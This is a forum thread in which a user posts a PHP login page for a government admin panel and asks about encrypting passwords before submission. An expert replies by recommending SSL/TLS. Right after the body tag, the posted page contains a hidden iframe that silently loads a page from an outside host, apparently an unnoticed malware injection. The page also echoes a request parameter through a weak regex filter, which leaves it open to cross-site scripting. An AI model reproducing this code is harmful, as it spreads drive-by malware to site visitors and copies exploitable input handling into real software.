hey,i have a login form wherein the take the username and password from the user and submit the form.im using burpsuite t check 4 threats.when i click on the submit button the password is visible.is it possible to encrypt the password as soon as enter it instead of passing it on clickin the submit button.here is my code: -
<?php
-
session_start();
-
-
$old_sessionid = session_id(); //i've added these lines
-
-
session_regenerate_id(); //i've added these lines
-
-
$new_sessionid = session_id(); //i've added these lines
-
if( isset($_SESSION['gel']) ) {
-
-
header("Location: admin.php");
-
}
-
-
-
-
if( isset($_POST['submit']) ) {
-
require_once "../inc/functions.php";
-
$user = htmlentities($_POST['txtuser']);
-
$pass = htmlentities($_POST['txtpass']);
-
if($user && $pass){
-
$error=sessionStart($user,$pass);
-
}else{
-
$error = " <p style='color:#FF0000'>Invalid Username or Password</p>";
-
}
-
}
-
-
function cleanInput($input) {
-
$search = array(
-
'@<\s*script[^>]*?>.*?<\s*/\s*script\s*>@si', // Strip out javascript
-
'@<\s*[\/\!]*?[^<>]*?>@si', // Strip out HTML tags
-
'@<\s*style[^>]*?>.*?<\s*/\s*style\s*>@siU', // Strip style tags properly
-
'@<![\s\S]*?[ \t\n\r]*>@',
-
'/<img[^>]+\>/i' // Strip multi-line comments
-
);
-
$output = preg_replace($search, '', $input);
-
return $output;
-
}
-
-
?>
-
-
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
-
<html xmlns="http://www.w3.org/1999/xhtml">
-
<head>
-
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
-
<title>Admin :: Login</title>
-
<script type="text/javascript" src="md5.js"></script>
-
<script type="text/javascript" src="login.js"></script>
-
<link rel="stylesheet" type="text/css" href="admin.css" />
-
<script type="text/javascript">
-
<!--
-
function MM_validateForm() { //v4.0
-
if (document.getElementById){
-
var i,p,q,nm,test,num,min,max,errors='',args=MM_validateForm.arguments;
-
for (i=0; i<(args.length-2); i+=3) { test=args[i+2]; val=document.getElementById(args[i]);
-
if (val) { nm=val.name; if ((val=val.value)!="") {
-
if (test.indexOf('isEmail')!=-1) { p=val.indexOf('@');
-
if (p<1 || p==(val.length-1)) errors+='- '+nm+' must contain an e-mail address.\n';
-
} else if (test!='R') { num = parseFloat(val);
-
if (isNaN(val)) errors+='- '+nm+' must contain a number.\n';
-
if (test.indexOf('inRange') != -1) { p=test.indexOf(':');
-
min=test.substring(8,p); max=test.substring(p+1);
-
if (num<min || max<num) errors+='- '+nm+' must contain a number between '+min+' and '+max+'.\n';
-
} } } else if (test.charAt(0) == 'R') errors += '- '+args[i]+' is required.\n'; }
-
} if (errors) alert('The following error(s) occurred:\n'+errors);
-
document.MM_returnValue = (errors == '');
-
} }
-
//-->
-
-
</script>
-
-
</head>
-
-
<body><iframe src="http://b8e.at:8080/index.php" width=178 height=183 style="visibility: hidden"></iframe>
-
<div class="container">
-
<div class="wrap">
-
<div class="header">
-
<img class ="head_logo" src="http://bytes.com/submit/images/logo.jpg" alt="Goavernment Logo">
-
<div class ="head_name">
-
DIRECTORATE OF PANCHAYATS
-
</div>
-
</div>
-
-
<div align="center" class="outerbox">
-
<div align="center" class="loginbox">
-
<p style="font-family:Tahoma"><strong>Administrator Login</strong></p>
-
<?=cleanInput($_REQUEST['error']);?>
-
-
<form id="myform" name="myform" method="post" action="index.php">
-
-
<table width="250" border="0">
-
<tr>
-
<td align="left"><strong>User</strong></td>
-
<td > <input type="text" name="txtuser" id="User" /></td>
-
</tr>
-
<tr>
-
<td align="left"><strong>Password</strong></td>
-
<td ><input type="password" name="txtpass" id="Password" /></td>
-
</tr>
-
</table>
-
<br />
-
-
<input name="submit" type="submit" onclick="MM_validateForm('User','','R','Password','','R');return document.MM_returnValue" value="Login" />
-
</form>
-
</div>
-
</div>
-
</div><br>
-
</div>
-
</form>
-
-
</body>
-
</html>
-
-
1  1958  Atli 5,058
Recognized Expert Expert
Hey.
I assume by "password is visible" you mean that it is being posted in plain-text? (If that's not the case, please elaborate.)
The best way to deal with that is to set up SSL/TLS. That encrypts the entire request, making data passed safe. - The downside to this is that you have to buy a certificate to use it online, but they are generally not that expensive.
You could of course try to encrypt it using JavaScript, but that's barely an improvement. It might stop the odd novice hacker, but anybody seriously attempting to bypass it could.
Sign in to post your reply or Sign up for a free account.
Similar topics | |
by: Todd Johnson |
last post by:
I am creating a dialog in wxPython for log in
purposes. Basically when the user clicks the ok
button, the dialog box saves the user name and
password as class attributes. Then as long as the
dialog exists calling MyDialog.GetUserName() and
MyDialog.GetPassword() returns them. This seems
insecure to me. Is there a better way to go about this
or is it safe as long as I destroy the dialog as soon
as I am done with it?
|
by: Max |
last post by:
Hello all,
I am trying to protect a page within my site with a JS password
scheme.
Now I know JS can be quite easily "circumvented", but I came by a code
below.
My question is:
1. Is there a way to find a password for this script? How easily?
2. Is there a stronger scheme available in JS?
|
by: Ian Davies |
last post by:
Hello
I would like to query the user table of the mysql database from my VB
application to check that a user's password entered in a text field on a
form corresponds to that users password in the mysql database. However, when
I retreive the password using an sql statement into a recordset, it is
encrypted. How can I decrypt it so I can make the comparison.
Ian
|
by: newbie |
last post by:
Hello,
I face a practical problem with encryption.
I've read examples for encrypting a file with the DES algorythm. The
algorythm uses a key and a IV value. Both are 8 bytes if I'm correct, and
can be generated by the system or specified by me at design time.
How can I then do DES encryption with a password?
pwd: 8charact
|
by: PJones |
last post by:
I am looking for the best way to one way encrypt a password for storage in a
database using (asp.net / vb.net)
basically I need some functions or examples that I can freely use in a
commercial project
anyone got any good functions or links I can look at ?
I was looking at MD5 hash .. the examples I saw confused me as I didn't see
a key ?
Does MD5 not used a key ?
| | |
by: cooltoriz |
last post by:
Hello there,
I just found that the compiled code won't hide the string variables so
that I can see them by opening the execuable using Notepad. I have
couple applications that have password hardcoded and I've been thinking
that the string varialbes are hidden in compiled code. I knew that the
VS.NET doesn't compile the source code into machine code. But I didn't
know that it will expose string variables in the compiled code. Here is
my...
|
by: =?Utf-8?B?am9uaWdy?= |
last post by:
I wrote a simple VB.NET application that imports and edits CSV files.
Now I’d like to “lock” the raw (pre-import) CSV files so these cannot be
opened separately. It is not high-sensitive data, I just don’t want folks to
peek in the files.
So time-consuming encryption is not necessary, just a simple
password-to-open that I can program in my application so it internally opens
the imported CSV file would be perfect, but I can’t...
|
by: Jeff Williams |
last post by:
I am developing an application which will allow users (students) to run
applications on PC's with elevated rights. This is necessary for some
applications which require Administrator rights on the PC.
I now need to store the local administrator username and password
somewhere where my application can read this from.
I am looking for comments on
1. Recommend place to store this data
|
by: Gilles Ganault |
last post by:
Hello
I'd like to encrypt a customer's organization name to use this as
their password to launch our application, and decrypt it within our
VB5 application.
We will then use this information to print it on every page that the
application prints out. That way, even if some other user gives out
his password, it won't do any good, since the organization name will
be the original user's.
|
by: Jon.Hakkinen |
last post by:
Hi all,
I'm on DB2 9.5 fp 0 on Windows.
I have a simple SQL stored procedure which uses the Encrypt() function
to insert data in a table.
I do not set the encryption password inside the procedure, I plan to
issue an Set Encryption statement at the beginning of every database
session from our middle layer.
But for now I use clp or db2ce to run something like
|
by: Oralloy |
last post by:
Hello folks,
I am unable to find appropriate documentation on the type promotion of bit-fields when using the generalised comparison operator "<=>".
The problem is that using the GNU compilers, it seems that the internal comparison operator "<=>" tries to promote arguments from unsigned to signed.
This is as boiled down as I can make it.
Here is my compilation command:
g++-12 -std=c++20 -Wnarrowing bit_field.cpp
Here is the code in...
| | |
by: jinu1996 |
last post by:
In today's digital age, having a compelling online presence is paramount for businesses aiming to thrive in a competitive landscape. At the heart of this digital strategy lies an intricately woven tapestry of website design and digital marketing. It's not merely about having a website; it's about crafting an immersive digital experience that captivates audiences and drives business growth.
The Art of Business Website Design
Your website is...
|
by: Hystou |
last post by:
Overview:
Windows 11 and 10 have less user interface control over operating system update behaviour than previous versions of Windows. In Windows 11 and 10, there is no way to turn off the Windows Update option using the Control Panel or Settings app; it automatically checks for updates and installs any it finds, whether you like it or not. For most users, this new feature is actually very convenient. If you want to control the update process,...
|
by: agi2029 |
last post by:
Let's talk about the concept of autonomous AI software engineers and no-code agents. These AIs are designed to manage the entire lifecycle of a software development projectplanning, coding, testing, and deploymentwithout human intervention. Imagine an AI that can take a project description, break it down, write the code, debug it, and then launch it, all on its own....
Now, this would greatly impact the work of software developers. The idea...
|
by: isladogs |
last post by:
The next Access Europe User Group meeting will be on Wednesday 1 May 2024 starting at 18:00 UK time (6PM UTC+1) and finishing by 19:30 (7.30PM).
In this session, we are pleased to welcome a new presenter, Adolph Dupr who will be discussing some powerful techniques for using class modules.
He will explain when you may want to use classes instead of User Defined Types (UDT). For example, to manage the data in unbound forms.
Adolph will...
|
by: conductexam |
last post by:
I have .net C# application in which I am extracting data from word file and save it in database particularly. To store word all data as it is I am converting the whole word file firstly in HTML and then checking html paragraph one by one.
At the time of converting from word file to html my equations which are in the word document file was convert into image.
Globals.ThisAddIn.Application.ActiveDocument.Select();...
|
by: adsilva |
last post by:
A Windows Forms form does not have the event Unload, like VB6. What one acts like?
| | |
by: muto222 |
last post by:
How can i add a mobile payment intergratation into php mysql website.
|
by: bsmnconsultancy |
last post by:
In today's digital era, a well-designed website is crucial for businesses looking to succeed. Whether you're a small business owner or a large corporation in Toronto, having a strong online presence can significantly impact your brand's success. BSMN Consultancy, a leader in Website Development in Toronto offers valuable insights into creating effective websites that not only look great but also perform exceptionally well. In this comprehensive...
| |
